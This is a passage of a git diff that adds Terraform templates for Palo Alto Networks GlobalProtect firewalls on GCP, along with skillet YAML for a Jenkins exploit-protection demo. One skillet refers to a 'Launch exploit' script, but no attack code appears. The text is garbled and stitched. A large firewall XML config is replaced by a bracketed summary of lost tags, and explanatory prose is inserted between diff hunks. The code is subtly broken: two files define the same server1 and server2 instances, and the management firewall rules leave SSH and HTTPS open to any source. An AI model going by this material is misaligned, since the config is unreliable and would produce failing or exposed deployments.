new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt
@@ -0,0 +1 @@
+
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal.tf b/gcp/GP-NoAutoScaling/bootstrap-portal.tf
new file mode 100644
index 00000000..6f6dbe07
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal.tf
@@ -0,0 +1,31 @@
+resource "google_storage_bucket" "portal_bucket" {
+ name = "portal-${random_id.random_number.hex}"
+ storage_class = "REGIONAL"
+ location = var.GCP_Region
+ project = google_project.globalprotect.number
+}
+resource "google_storage_bucket_object" "portal_bootstrap" {
+ name = "config/bootstrap.xml"
+ source = "bootstrap-portal/bootstrap.xml"
+ bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_init_cfg" {
+ name = "config/init-cfg.txt"
+ source = "bootstrap-portal/init-cfg.txt"
+ bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_content" {
+ name = "content/null.txt"
+ source = "bootstrap-portal/null.txt"
+ bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_software" {
+ name = "software/null.txt"
+ source = "bootstrap-portal/null.txt"
+ bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_license" {
+ name = "license/null.txt"
+ source = "bootstrap-portal/null.txt"
+ bucket = google_storage_bucket.portal_bucket.name
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml
new file mode 100644
index 00000000..181c989d
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml
@@ -0,0 +1,2424 @@
+
+
+
+
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+
+
+ yes
+ yes
+ yes
+ yes
+
+
+ yes
+ FW-1
+
+
+
+ yes
+
+
+ FQDN
+
+ [The remainder of this bootstrap.xml hunk lost its XML element tags during extraction; only element
+  values survive. The recoverable settings include: the admin SSH public key; DHCP-client management
+  settings with hostname FW-1 and mgmt-interface-swap; default, Suite-B-GCM-128 and Suite-B-GCM-256
+  IKE/IPsec crypto profiles; a GlobalProtect portal and gateway on ethernet1/1 with local
+  authentication, the GP-CA certificate authority and the dummy-portal-cert / dummy-gw-cert
+  certificates; a DNS-sinkhole block rule plus Outbound (allow) and Inbound (drop) security rules;
+  Outbound, Inbound, Internal and Alert-Only security profile groups (AV, AS, VP, URL, FB, WF);
+  strict vulnerability and anti-spyware profiles using the sinkhole addresses 72.5.65.111 and
+  2600:5200::1; URL filtering profiles with Black-List and White-List custom categories; file
+  blocking and WildFire analysis profiles; SSL/TLS service and decryption settings; and log settings
+  that forward All Logs for traffic, threat, wildfire, url, data, tunnel and auth. The configuration
+  is based on iron-skillet template version 1.0.6.]
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt
new file mode 100644
index 00000000..3606b11c
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt
@@ -0,0 +1,14 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
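As a reference for how this init-cfg.txt is consumed, the file only takes effect if it is uploaded into the config/ folder of the bootstrap bucket named by the firewall's vmseries-bootstrap-gce-storagebucket metadata key. A minimal sketch of that upload, assuming the portal bootstrap bucket is declared elsewhere in this plan as google_storage_bucket.portal_bucket (the name referenced by portal.tf below); the resource label portal_init_cfg is illustrative only:

    # Sketch: place the bootstrap files into the folder layout PAN-OS expects
    # (config/, content/, software/, license/).
    resource "google_storage_bucket_object" "portal_init_cfg" {
      name   = "config/init-cfg.txt"                    # destination path inside the bucket
      source = "bootstrap-portal/init-cfg.txt"          # the file added in this commit
      bucket = google_storage_bucket.portal_bucket.name # assumed bucket resource name
    }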
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt
@@ -0,0 +1 @@
+
diff --git a/gcp/GP-NoAutoScaling/gateways.tf b/gcp/GP-NoAutoScaling/gateways.tf
new file mode 100644
index 00000000..eb72ede5
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/gateways.tf
@@ -0,0 +1,121 @@
+resource "google_compute_address" "gp_gateway1_management" {
+ name = "gp-gateway1-management"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_address" "gp_gateway1_untrust" {
+ name = "gp-gateway1-untrust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_instance" "gateway1" {
+ project = google_project.globalprotect.number
+ name = "gp-gateway1"
+ machine_type = var.FW_Machine_Type
+ zone = data.google_compute_zones.available.names[0]
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.untrust_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_gateway1_untrust.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_gateway1_management.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.trust_subnet.self_link
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.FW_Image}-${var.FW_PanOS}"
+ type = "pd-ssd"
+ }
+ }
+}
+
+resource "google_compute_address" "gp_gateway2_management" {
+ name = "gp-gateway2-management"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_address" "gp_gateway2_untrust" {
+ name = "gp-gateway2-untrust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_instance" "gateway2" {
+ project = google_project.globalprotect.number
+ name = "gp-gateway2"
+ machine_type = var.FW_Machine_Type
+ zone = data.google_compute_zones.available.names[1]
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.gateway_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.untrust_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_gateway2_untrust.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_gateway2_management.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.trust_subnet.self_link
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.FW_Image}-${var.FW_PanOS}"
+ type = "pd-ssd"
+ }
+ }
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/gcp_firewall.tf b/gcp/GP-NoAutoScaling/gcp_firewall.tf
new file mode 100644
index 00000000..afa4bc13
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/gcp_firewall.tf
@@ -0,0 +1,33 @@
+resource "google_compute_firewall" "management" {
+ name = "management-firewall"
+ project = google_project.globalprotect.number
+ network = google_compute_network.management_network.name
+ allow {
+ protocol = "tcp"
+ ports = ["22", "443"]
+ }
+}
+resource "google_compute_firewall" "untrust" {
+ name = "untrust-firewall"
+ project = google_project.globalprotect.number
+ network = google_compute_network.untrust_network.name
+ allow {
+ protocol = "tcp"
+ ports = ["443"]
+ }
+ allow {
+ protocol = "udp"
+ ports = ["500","4500","4501"]
+ }
+ allow {
+ protocol = "esp"
+ }
+}
+resource "google_compute_firewall" "trust" {
+ name = "trust-firewall"
+ project = google_project.globalprotect.number
+ network = google_compute_network.trust_network.name
+ allow {
+ protocol = "all"
+ }
+}
\ No newline at end of file
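Note that none of these firewall rules set source_ranges, so GCP applies its default source of 0.0.0.0/0 and the management and untrust networks accept the listed ports from any address. A hedged sketch of tightening the management rule to a trusted CIDR; the 203.0.113.0/24 range is a placeholder and not part of the original template:

    resource "google_compute_firewall" "management" {
      name    = "management-firewall"
      project = google_project.globalprotect.number
      network = google_compute_network.management_network.name

      # Restrict SSH/HTTPS management access to a known admin network.
      source_ranges = ["203.0.113.0/24"] # placeholder CIDR; replace with your admin range

      allow {
        protocol = "tcp"
        ports    = ["22", "443"]
      }
    }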
diff --git a/gcp/GP-NoAutoScaling/images/GP_in_GCP.png b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png
new file mode 100644
index 00000000..989ebab3
Binary files /dev/null and b/gcp/GP-NoAutoScaling/images/GP_in_GCP.png differ
diff --git a/gcp/GP-NoAutoScaling/main.tf b/gcp/GP-NoAutoScaling/main.tf
new file mode 100644
index 00000000..c6940ef9
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/main.tf
@@ -0,0 +1,3 @@
+provider "google" {}
+
+provider "random" {}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/output.tf b/gcp/GP-NoAutoScaling/output.tf
new file mode 100644
index 00000000..754d45d4
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/output.tf
@@ -0,0 +1,11 @@
+output "Portal-Management-IP" {
+ value = "${google_compute_instance.portal.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "Gateway1-Management-IP" {
+ value = "${google_compute_instance.gateway1.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "Gateway2-Management-IP" {
+ value = "${google_compute_instance.gateway2.network_interface.1.access_config.0.nat_ip}"
+}
\ No newline at end of file
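These outputs use the legacy attribute-index syntax (network_interface.1.access_config.0.nat_ip) inside "${...}" interpolation. It still works under Terraform 0.12, but the bracketed form is the current idiom; a sketch of the equivalent output:

    output "Portal-Management-IP" {
      # network_interface[1] is the management NIC; access_config[0] holds its public NAT IP
      value = google_compute_instance.portal.network_interface[1].access_config[0].nat_ip
    }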
diff --git a/gcp/GP-NoAutoScaling/portal.tf b/gcp/GP-NoAutoScaling/portal.tf
new file mode 100644
index 00000000..dfed3411
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/portal.tf
@@ -0,0 +1,56 @@
+resource "google_compute_address" "gp_portal_management" {
+ name = "gp-portal-management"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_address" "gp_portal_untrust" {
+ name = "gp-portal-untrust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+}
+
+resource "google_compute_instance" "portal" {
+ project = google_project.globalprotect.number
+ name = "gp-portal"
+ machine_type = var.FW_Machine_Type
+ zone = data.google_compute_zones.available.names[0]
+ can_ip_forward = false
+ allow_stopping_for_update = true
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.untrust_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_portal_untrust.address
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {
+ nat_ip = google_compute_address.gp_portal_management.address
+ }
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.FW_Image}-${var.FW_PanOS}"
+ type = "pd-ssd"
+ }
+ }
+}
diff --git a/gcp/GP-NoAutoScaling/project.tf b/gcp/GP-NoAutoScaling/project.tf
new file mode 100644
index 00000000..e44a7ff4
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/project.tf
@@ -0,0 +1,19 @@
+resource "random_id" "random_number" {
+ byte_length = 2
+}
+resource "google_project" "globalprotect" {
+ name = "${var.Base_Project_Name}-${random_id.random_number.hex}"
+ project_id = "${var.Base_Project_Name}-${random_id.random_number.hex}"
+ billing_account = var.Billing_Account
+ auto_create_network = false
+}
+resource "google_project_service" "globalprotect" {
+ project = google_project.globalprotect.number
+ service = "storage-api.googleapis.com"
+ disable_dependent_services = true
+}
+
+data "google_compute_zones" "available" {
+ project = google_project.globalprotect.project_id
+ region = var.GCP_Region
+}
\ No newline at end of file
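project.tf only enables the Storage API (storage-api.googleapis.com) on the newly created project, while the rest of the plan creates Compute Engine resources. Whether the Compute Engine API is enabled elsewhere is not visible in this diff; if it is not, a sketch of enabling it in the same pattern would be:

    resource "google_project_service" "compute" {
      project                    = google_project.globalprotect.number
      service                    = "compute.googleapis.com" # Compute Engine API
      disable_dependent_services = true
    }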
diff --git a/gcp/GP-NoAutoScaling/servers.tf b/gcp/GP-NoAutoScaling/servers.tf
new file mode 100644
index 00000000..f503ff40
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/servers.tf
@@ -0,0 +1,77 @@
+resource "google_compute_instance" "server1" {
+ name = "server1"
+ project = google_project.globalprotect.number
+ zone = data.google_compute_zones.available.names[0]
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts {
+ create = "15m"
+ delete = "60m"
+ }
+
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {}
+ }
+}
+
+resource "google_compute_instance" "server2" {
+ name = "server2"
+ project = google_project.globalprotect.number
+ zone = data.google_compute_zones.available.names[1]
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts {
+ create = "15m"
+ delete = "60m"
+ }
+
+ metadata = {
+ vmseries-bootstrap-gce-storagebucket = google_storage_bucket.portal_bucket.name
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.management_subnet.self_link
+ access_config {}
+ }
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/terraform.tfvars b/gcp/GP-NoAutoScaling/terraform.tfvars
new file mode 100644
index 00000000..780ca566
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/terraform.tfvars
@@ -0,0 +1,22 @@
+Billing_Account = ""
+
+Base_Project_Name = ""
+
+Public_Key_Path = "~/.ssh/id_rsa.pub"
+
+GCP_Region = ""
+
+#FW_PanOS = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL
+FW_PanOS = "bundle1-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1
+#FW_PanOS = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2
+
+FW_Image = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+
+
+Management_Subnet_CIDR = "10.0.0.0/24"
+
+Untrust_Subnet_CIDR = "10.0.1.0/24"
+
+Trust_Subnet_CIDR = "10.0.2.0/24"
+
+FW_Machine_Type = "n1-standard-4"
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/variables.tf b/gcp/GP-NoAutoScaling/variables.tf
new file mode 100644
index 00000000..fb7a8311
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/variables.tf
@@ -0,0 +1,10 @@
+variable Billing_Account {}
+variable Base_Project_Name {}
+variable Public_Key_Path {}
+variable GCP_Region {}
+variable Management_Subnet_CIDR {}
+variable Untrust_Subnet_CIDR {}
+variable Trust_Subnet_CIDR {}
+variable FW_Machine_Type {}
+variable FW_PanOS {}
+variable FW_Image {}
\ No newline at end of file
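These variables are declared without types, descriptions, or defaults, so every value must come from terraform.tfvars and mistakes surface only at plan time. A purely illustrative sketch of a more self-documenting declaration for two of them; the default shown is the value already used in terraform.tfvars:

    variable "FW_Machine_Type" {
      type        = string
      default     = "n1-standard-4"
      description = "Machine type used for the VM-Series firewall instances"
    }

    variable "GCP_Region" {
      type        = string
      description = "Region in which all regional resources (addresses, subnets, buckets) are created"
    }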
diff --git a/gcp/GP-NoAutoScaling/vpc-subnets.tf b/gcp/GP-NoAutoScaling/vpc-subnets.tf
new file mode 100644
index 00000000..5373f55c
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/vpc-subnets.tf
@@ -0,0 +1,36 @@
+resource "google_compute_network" "management_network" {
+ project = google_project.globalprotect.number
+ name = "management"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "untrust_network" {
+ project = google_project.globalprotect.number
+ name = "untrust"
+ auto_create_subnetworks = false
+}
+resource "google_compute_network" "trust_network" {
+ project = google_project.globalprotect.number
+ name = "trust"
+ auto_create_subnetworks = false
+}
+resource "google_compute_subnetwork" "management_subnet" {
+ name = "management"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+ ip_cidr_range = var.Management_Subnet_CIDR
+ network = google_compute_network.management_network.self_link
+}
+resource "google_compute_subnetwork" "untrust_subnet" {
+ name = "untrust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+ ip_cidr_range = var.Untrust_Subnet_CIDR
+ network = google_compute_network.untrust_network.self_link
+}
+resource "google_compute_subnetwork" "trust_subnet" {
+ name = "trust"
+ project = google_project.globalprotect.number
+ region = var.GCP_Region
+ ip_cidr_range = var.Trust_Subnet_CIDR
+ network = google_compute_network.trust_network.self_link
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/webservers.tf b/gcp/GP-NoAutoScaling/webservers.tf
new file mode 100644
index 00000000..cbf1c424
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/webservers.tf
@@ -0,0 +1,75 @@
+resource "google_compute_instance" "server1" {
+ name = "server1"
+ project = google_project.globalprotect.number
+ zone = data.google_compute_zones.available.names[0]
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts {
+ create = "15m"
+ delete = "60m"
+ }
+
+ metadata = {
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1804-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.trust_subnet.self_link
+ access_config {}
+ }
+}
+
+resource "google_compute_instance" "server2" {
+ name = "server2"
+ project = google_project.globalprotect.number
+ zone = data.google_compute_zones.available.names[1]
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ timeouts {
+ create = "15m"
+ delete = "60m"
+ }
+
+ metadata = {
+ serial-port-enable = true
+ ssh-keys = fileexists(var.Public_Key_Path) ? "admin:${file(var.Public_Key_Path)}" : ""
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1804-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = google_compute_subnetwork.trust_subnet.self_link
+ access_config {}
+ }
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
new file mode 100644
index 00000000..ae3c0a1b
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
@@ -0,0 +1,88 @@
+name: gcp_jenkins_exp
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 1 Infrastructure Deployment Build
+
+description: >
+ This skillet deploys the Security Framework GCP Jenkins Exploit Protection environment. The template deploys the following:
+ GCP projects, VPCs, route tables, subnets, availability zones, load balancers, and the native security tools (WAF and network security groups).
+ The template also deploys a Palo Alto Networks firewall with its security posture applied.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+ - name: username
+ description: FW Username
+ default: admin
+ type_hint: text
+ - name: password
+ description: FW Password
+ default:
+ type_hint: password
+ - name: GCP_Region
+ description: GCP Region
+ default: us-central1
+ type_hint: dropdown
+ dd_list:
+ - key: "US-Central-1 (Iowa)"
+ value: "us-central1"
+ - key: "US-East-1 (South Carolina)"
+ value: "us-east1"
+ - key: "US-East-4 (Virginia)"
+ value: "us-east4"
+ - key: "US-West-1 (Oregon)"
+ value: "us-west1"
+ - key: "US-West-2 (California)"
+ value: "us-west2"
+ - key: "Europe-North-1 (Finland)"
+ value: "europe-north1"
+ - key: "Europe-West-1 (Belgium)"
+ value: "europe-west1"
+ - key: "Europe-West-2 (UK)"
+ value: "europe-west2"
+ - key: "Europe-West-3 (Germany)"
+ value: "europe-west3"
+ - key: "Europe-West-4 (Netherlands)"
+ value: "europe-west4"
+ - key: "Europe-West-6 (Switzerland)"
+ value: "europe-west6"
+ - key: "North-America-Northeast-1 (Canada)"
+ value: "northamerica-northeast1"
+ - key: "South-America-East-1 (Brazil)"
+ value: "southamerica-east1"
+ - key: "Asia-East-1 (Taiwan)"
+ value: "asia-east1"
+ - key: "Asia-East-2 (Hong Kong)"
+ value: "asia-east2"
+ - key: "Asia-Northeast-1 (Tokyo)"
+ value: "asia-northeast1"
+ - key: "Asia-Northeast-2 (Osaka)"
+ value: "asia-northeast2"
+ - key: "Asia-South-1 (India)"
+ value: "asia-south1"
+ - key: "Asia-Southeast-1 (Singapore)"
+ value: "asia-southeast1"
+ - key: "Australia-Southeast-1 (Australia)"
+ value: "australia-southeast1"
+ - name: Billing_Account
+ description: GCP Billing Account
+ default:
+ type_hint: text
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: script
+ file: ../../deploy.py
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
new file mode 100644
index 00000000..dcd0ad24
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
@@ -0,0 +1,41 @@
+name: gcp_jenkins_exp_teardown
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 4 Teardown
+
+description: >
+ This skillet will destroy the GCP Jenkins Environment. Run this step once the demo is complete.
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+ - name: username
+ description: FW Username
+ default: admin
+ type_hint: text
+ - name: password
+ description: FW Password
+ default:
+ type_hint: password
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: script
+ file: ../../destroy.py
+# output_type:
+# outputs:
+# - name: app_threat_version
+# capture_pattern: result/content-updates/entry/version
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
new file mode 100644
index 00000000..539c9b30
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
@@ -0,0 +1,41 @@
+name: gcp_jenkins_launch
+# label used for menu selection
+label: GCP Jenkins Security Framework Step 2 Launch exploit
+
+description: >
+ This skillet launches the Jenkins exploit. You can choose either the native tools or the PAN-OS enabled
+ security stack when running the exploit against the Jenkins web application.
+
+# type of skillet (panos or panorama or template or terraform)
+type: python3
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+ - name: vector
+ description: Attack Vector
+ default: native
+ type_hint: dropdown
+ dd_list:
+ - key: Native WAF
+ value: native
+ - key: PAN-OS
+ value: panos
+
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: payload
+ file: ../../launch_attack_vector.py
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml
new file mode 100644
index 00000000..9f46a8bb
--- /dev/null
+++ b/gcp/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml
@@ -0,0 +1,32 @@
+name: GCP_login
+label: GCP Login (Pre-Deployment Step)
+
+description: |
+ This skillet will log into GCP. You will be prompted to follow a link and enter a device-code in your browser.
+# type of skillet (panos or panorama or template or terraform)
+type: template
+
+# more complex skillets may express a dependency on another skillet that should be loaded before this one.
+# For example, a set of skillets may build off of a single 'golden config' that contains shared configuration
+# As this skillet is very simple, there is no need to build on another one.
+extends:
+
+# Labels allow grouping and type specific options and are generally only used in advanced cases
+labels:
+ collection: GCP Jenkins Security Framework
+
+# variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
+# may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
+variables:
+# - name: api_key
+# description: API Key
+# default: abc123
+# type_hint: text
+
+# Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
+# determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
+# to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
+# in the 'variables' section.
+snippets:
+ - name: script
+ file: docker_cmd.j2
